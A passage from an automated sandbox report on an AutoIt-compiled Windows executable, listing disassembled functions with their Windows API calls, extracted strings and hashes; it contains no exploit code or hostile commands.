                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CBA709
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                • API String ID: 2910397461-517079104
                                • Opcode ID: a904c3b242af78ffe451951026a42f3e1eb45bea8c8f77e0745704866701587f
                                • Instruction ID: 0f63f01f983a1df52d6cafa95c344ccd716b4f6a87dacc8df9fefb9ba36406fa
                                • Opcode Fuzzy Hash: a904c3b242af78ffe451951026a42f3e1eb45bea8c8f77e0745704866701587f
                                • Instruction Fuzzy Hash: 7EA16075A00255BFEB24DBA4DD8AFAE7BB9EB14710F008114F615EB2E0D770AD41CB64
                                Function 00CAE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00CAE45E
                                • GetDriveTypeW.KERNEL32(?,00CFDC88,?,\\.\,00CFDBF0), ref: 00CAE54B
                                • SetErrorMode.KERNEL32(00000000,00CFDC88,?,\\.\,00CFDBF0), ref: 00CAE6B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorMode$DriveType
                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                • API String ID: 2907320926-4222207086
                                • Opcode ID: 10b7837b2b8a1ec15cd0df9436b7ffe9bdca48d04804e8556a48d17b7313d3e4
                                • Instruction ID: 382b30730f140df6f46929e2d6090d91d4f3357da75e3309549652d1d4683a24
                                • Opcode Fuzzy Hash: 10b7837b2b8a1ec15cd0df9436b7ffe9bdca48d04804e8556a48d17b7313d3e4
                                • Instruction Fuzzy Hash: D251D83020830BFFC610DF19D895969B7B1BB6670CB104E19F456AB191DB60DF89EBD2
                                Function 00C6C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                • API String ID: 1038674560-86951937
                                • Opcode ID: fd74d420297ee1bfea5899aa1dfd90492bd1ef716d83489de65cc97f5da5848e
                                • Instruction ID: 5fd37f23edc17a3e783aa1e2b0b1b44c1174d341d64b840d09fe4c3e2a503b45
                                • Opcode Fuzzy Hash: fd74d420297ee1bfea5899aa1dfd90492bd1ef716d83489de65cc97f5da5848e
                                • Instruction Fuzzy Hash: C3614B713003057BDB31BA248CC2FBA3399AF16744F144025FEA6A61C2EB50DB45D7B6
                                Function 00CCC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                Download Yara Rule
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00CCC598
                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CCC64E
                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 00CCC669
                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00CCC925
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$Window
                                • String ID: 0
                                • API String ID: 2326795674-4108050209
                                • Opcode ID: 5a1b763cd3afa7c7abb8440746ae1b5c825579fd9e14f8a386fa2b49ede6621d
                                • Instruction ID: fabbd512b7953821188f0e527ae42ba485733a67c12aca247b2ef12153db4078
                                • Opcode Fuzzy Hash: 5a1b763cd3afa7c7abb8440746ae1b5c825579fd9e14f8a386fa2b49ede6621d
                                • Instruction Fuzzy Hash: 66F1CF71104341AFE7218F24C8C9FAABBE4FF49354F084A2DF5AD962A1C774DA41EB52
                                Function 00CC6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(?,?,00CFDBF0), ref: 00CC6245
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                • API String ID: 3964851224-45149045
                                • Opcode ID: 3ecc680bae7432e9bd3903833d10ad48e3135d3647fb06bb8b0ea449e2f4b2b6
                                • Instruction ID: 4b6f621a89ed70a555e5b086a74c4f4c8d179df70cc8eb2ad1ec671c84f38b3a
                                • Opcode Fuzzy Hash: 3ecc680bae7432e9bd3903833d10ad48e3135d3647fb06bb8b0ea449e2f4b2b6
                                • Instruction Fuzzy Hash: 1CC181742082019BCB14EF14C591FAE7796AF95354F18886CF8965B3E6CF20DE4BDB82
                                Function 00CCD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetSysColor.USER32(00000012), ref: 00CCD3BE
                                • SetTextColor.GDI32(?,?), ref: 00CCD3C2
                                • GetSysColorBrush.USER32(0000000F), ref: 00CCD3D8
                                • GetSysColor.USER32(0000000F), ref: 00CCD3E3
                                • CreateSolidBrush.GDI32(?), ref: 00CCD3E8
                                • GetSysColor.USER32(00000011), ref: 00CCD400
                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCD40E
                                • SelectObject.GDI32(?,00000000), ref: 00CCD41F
                                • SetBkColor.GDI32(?,00000000), ref: 00CCD428
                                • SelectObject.GDI32(?,?), ref: 00CCD435
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00CCD454
                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCD46B
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00CCD480
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CCD4A8
                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CCD4CF
                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00CCD4ED
                                • DrawFocusRect.USER32(?,?), ref: 00CCD4F8
                                • GetSysColor.USER32(00000011), ref: 00CCD506
                                • SetTextColor.GDI32(?,00000000), ref: 00CCD50E
                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CCD522
                                • SelectObject.GDI32(?,00CCD0B5), ref: 00CCD539
                                • DeleteObject.GDI32(?), ref: 00CCD544
                                • SelectObject.GDI32(?,?), ref: 00CCD54A
                                • DeleteObject.GDI32(?), ref: 00CCD54F
                                • SetTextColor.GDI32(?,?), ref: 00CCD555
                                • SetBkColor.GDI32(?,?), ref: 00CCD55F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                • String ID:
                                • API String ID: 1996641542-0
                                • Opcode ID: 1aa32ca26f96e37bc494525d08e504ab72e5f6d00eef11efe7e3a5079bae40f1
                                • Instruction ID: b957f140514ea23990be1940cc1de24a4449908152effb2006ee06c2b5dee97a
                                • Opcode Fuzzy Hash: 1aa32ca26f96e37bc494525d08e504ab72e5f6d00eef11efe7e3a5079bae40f1
                                • Instruction Fuzzy Hash: 54512D71901248BFDF10DFA4DC88FAE7B79FB08320F254515FA26AB2A1D7759A40DB50
                                Function 00CCB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CCB5C0
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CCB5D1
                                • CharNextW.USER32(0000014E), ref: 00CCB600
                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CCB641
                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CCB657
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CCB668
                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CCB685
                                • SetWindowTextW.USER32(?,0000014E), ref: 00CCB6D7
                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CCB6ED
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CCB71E
                                • _memset.LIBCMT ref: 00CCB743
                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CCB78C
                                • _memset.LIBCMT ref: 00CCB7EB
                                • SendMessageW.USER32 ref: 00CCB815
                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CCB86D
                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00CCB91A
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCB93C
                                • GetMenuItemInfoW.USER32(?), ref: 00CCB986
                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CCB9B3
                                • DrawMenuBar.USER32(?), ref: 00CCB9C2
                                • SetWindowTextW.USER32(?,0000014E), ref: 00CCB9EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                • String ID: 0
                                • API String ID: 1073566785-4108050209
                                • Opcode ID: 6d6f955a402c2db64daecacaeff80dab9adf8b1b82b055f64c0c072132c70624
                                • Instruction ID: c4f6e431ba983a8b3b8042d126ccaadb59dbe8bf4ff8bd0a7eedd77896ea17d7
                                • Opcode Fuzzy Hash: 6d6f955a402c2db64daecacaeff80dab9adf8b1b82b055f64c0c072132c70624
                                • Instruction Fuzzy Hash: DDE15E75900258AEDB219F91DC86FEE7BB8EF05714F10815AF92AAB290D7708E41DF60
                                Function 00CC744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetCursorPos.USER32(?), ref: 00CC7587
                                • GetDesktopWindow.USER32 ref: 00CC759C
                                • GetWindowRect.USER32(00000000), ref: 00CC75A3
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC7605
                                • DestroyWindow.USER32(?), ref: 00CC7631
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CC765A
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC7678
                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CC769E
                                • SendMessageW.USER32(?,00000421,?,?), ref: 00CC76B3
                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CC76C6
                                • IsWindowVisible.USER32(?), ref: 00CC76E6
                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CC7701
                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CC7715
                                • GetWindowRect.USER32(?,?), ref: 00CC772D
                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00CC7753
                                • GetMonitorInfoW.USER32 ref: 00CC776D
                                • CopyRect.USER32(?,?), ref: 00CC7784
                                • SendMessageW.USER32(?,00000412,00000000), ref: 00CC77EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                • String ID: ($0$tooltips_class32
                                • API String ID: 698492251-4156429822
                                • Opcode ID: 8896a18c805938d635302035185cf51a4b0c84b35f3e0812662a08c3bce0c5af
                                • Instruction ID: be470bd001595f19e5c8c4f37a4912941fc79843ae2e02c1d70913cb7941db49
                                • Opcode Fuzzy Hash: 8896a18c805938d635302035185cf51a4b0c84b35f3e0812662a08c3bce0c5af
                                • Instruction Fuzzy Hash: 4BB14871608341AFDB14DF64C985B6ABBE5FF88310F008A1DF59A9B291DB70E905CF92
                                Function 00CA76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                Download Yara Rule
                                APIs
                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CA76ED
                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CA7713
                                • _wcscpy.LIBCMT ref: 00CA7741
                                • _wcscmp.LIBCMT ref: 00CA774C
                                • _wcscat.LIBCMT ref: 00CA7762
                                • _wcsstr.LIBCMT ref: 00CA776D
                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CA7789
                                • _wcscat.LIBCMT ref: 00CA77D2
                                • _wcscat.LIBCMT ref: 00CA77D9
                                • _wcsncpy.LIBCMT ref: 00CA7804
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                • API String ID: 699586101-1459072770
                                • Opcode ID: b03240edd600dcce7075904f41d9cd3382e3d5bbe6ee725ba580ceb51401e6f5
                                • Instruction ID: a51f492386b360d18e36b3b16ae83c242954f6285ee094da21abcaecfcbd275f
                                • Opcode Fuzzy Hash: b03240edd600dcce7075904f41d9cd3382e3d5bbe6ee725ba580ceb51401e6f5
                                • Instruction Fuzzy Hash: 04412772900205BEEB01B7609C8BEBF77ACEF16728F140165F901E70C2EB649A41E7B5
                                Function 00C7A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C7A839
                                • GetSystemMetrics.USER32(00000007), ref: 00C7A841
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C7A86C
                                • GetSystemMetrics.USER32(00000008), ref: 00C7A874
                                • GetSystemMetrics.USER32(00000004), ref: 00C7A899
                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C7A8B6
                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00C7A8C6
                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C7A8F9
                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C7A90D
                                • GetClientRect.USER32(00000000,000000FF), ref: 00C7A92B
                                • GetStockObject.GDI32(00000011), ref: 00C7A947
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7A952
                                  • Part of subcall function 00C7B736: GetCursorPos.USER32(000000FF), ref: 00C7B749
                                  • Part of subcall function 00C7B736: ScreenToClient.USER32(00000000,000000FF), ref: 00C7B766
                                  • Part of subcall function 00C7B736: GetAsyncKeyState.USER32(00000001), ref: 00C7B78B
                                  • Part of subcall function 00C7B736: GetAsyncKeyState.USER32(00000002), ref: 00C7B799
                                • SetTimer.USER32(00000000,00000000,00000028,00C7ACEE), ref: 00C7A979
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                • String ID: AutoIt v3 GUI
                                • API String ID: 1458621304-248962490
                                • Opcode ID: 647be723efb2ac6c4bc7b21d6c3446be1fe5c4e12f1aaf3cb0502dc807738e0e
                                • Instruction ID: 76fd8f741ba0dbdee825b75858c84c90b83481ecb8185799a30857d108a88868
                                • Opcode Fuzzy Hash: 647be723efb2ac6c4bc7b21d6c3446be1fe5c4e12f1aaf3cb0502dc807738e0e
                                • Instruction Fuzzy Hash: A7B16C75A0020AAFDB14DFA8DC85BAD7BB4FB58314F108229FA1AEB2D0D730D941DB51
                                Function 00CC352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC3626
                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CFDBF0,00000000,?,00000000,?,?), ref: 00CC3694
                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CC36DC
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CC3765
                                • RegCloseKey.ADVAPI32(?), ref: 00CC3A85
                                • RegCloseKey.ADVAPI32(00000000), ref: 00CC3A92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Close$ConnectCreateRegistryValue
                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                • API String ID: 536824911-966354055
                                • Opcode ID: 861e8d7e8bfedcd9a10183dc19aec9a5d540a5067d8bb175f57c86d87fa19027
                                • Instruction ID: 42dd6d72aa5e807f4e55e23b118ab515d92511f907323da9a96e354c45fd767c
                                • Opcode Fuzzy Hash: 861e8d7e8bfedcd9a10183dc19aec9a5d540a5067d8bb175f57c86d87fa19027
                                • Instruction Fuzzy Hash: 3E02AE752006419FCB14EF28D895E2AB7E4FF89324F04855DF99AAB3A1DB30ED05DB81
                                Function 00CC69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 00CC6A52
                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CC6B12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharMessageSendUpper
                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                • API String ID: 3974292440-719923060
                                • Opcode ID: bbd99168f0d438385bbd09ce0d1af03a7def1f00eaba2277f1508031934ceb52
                                • Instruction ID: 1e7b7fe456c15681854cfe8eac74940edfc4bb3e8071e7fea80f7312626a635b
                                • Opcode Fuzzy Hash: bbd99168f0d438385bbd09ce0d1af03a7def1f00eaba2277f1508031934ceb52
                                • Instruction Fuzzy Hash: F0A170702142019FCB14EF24CA91F6AB3A5EF45314F14896DF8A69B3D2DB30ED06EB52
                                Function 00C9DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetClassNameW.USER32(?,?,00000100), ref: 00C9DD87
                                • __swprintf.LIBCMT ref: 00C9DE28
                                • _wcscmp.LIBCMT ref: 00C9DE3B
                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C9DE90
                                • _wcscmp.LIBCMT ref: 00C9DECC
                                • GetClassNameW.USER32(?,?,00000400), ref: 00C9DF03
                                • GetDlgCtrlID.USER32(?), ref: 00C9DF55
                                • GetWindowRect.USER32(?,?), ref: 00C9DF8B
                                • GetParent.USER32(?), ref: 00C9DFA9
                                • ScreenToClient.USER32(00000000), ref: 00C9DFB0
                                • GetClassNameW.USER32(?,?,00000100), ref: 00C9E02A
                                • _wcscmp.LIBCMT ref: 00C9E03E
                                • GetWindowTextW.USER32(?,?,00000400), ref: 00C9E064
                                • _wcscmp.LIBCMT ref: 00C9E078
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
